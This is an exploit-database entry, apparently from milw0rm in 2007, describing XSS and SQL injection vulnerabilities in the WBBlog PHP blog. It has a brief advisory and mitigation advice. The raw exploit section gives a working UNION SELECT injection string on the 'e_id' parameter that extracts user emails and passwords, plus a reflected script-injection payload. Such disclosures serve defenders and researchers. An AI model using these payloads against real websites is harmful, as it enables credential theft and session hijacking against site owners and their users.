header-logo
Suggest Exploit
vendor:
WBBlog
by:
xoron
5.5
CVSS
MEDIUM
XSS/SQL Injection
89
CWE
Product Name: WBBlog
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

The WBBlog application is vulnerable to both XSS and SQL Injection attacks. The SQL Injection vulnerability can be exploited by sending a specially crafted request to the index.php file, allowing an attacker to execute arbitrary SQL commands. The XSS vulnerability can be exploited by injecting malicious code into the 'e_id' parameter of the viewentry page, potentially leading to session hijacking or defacement of the website.

Mitigation:

To mitigate the XSS vulnerability, proper input sanitization should be implemented to prevent the execution of injected scripts. To mitigate the SQL Injection vulnerability, prepared statements or parameterized queries should be used to ensure that user input is properly escaped and validated.
Source

Exploit-DB raw data:

======================x=o=r=o=n=====================

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

======================x=o=r=o=n=====================

Bulan: xoron

xoron.biz

======================x=o=r=o=n=====================

SQL INJ:

index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*

XSS :

index.php?cmd=viewentry&e_id="><script>alert('HACKED')</script>

======================x=o=r=o=n=====================

Vendor Site: http://liqua.com/wbblog.html

======================x=o=r=o=n=====================

Thnx: pang0

======================x=o=r=o=n=====================

# milw0rm.com [2007-03-15]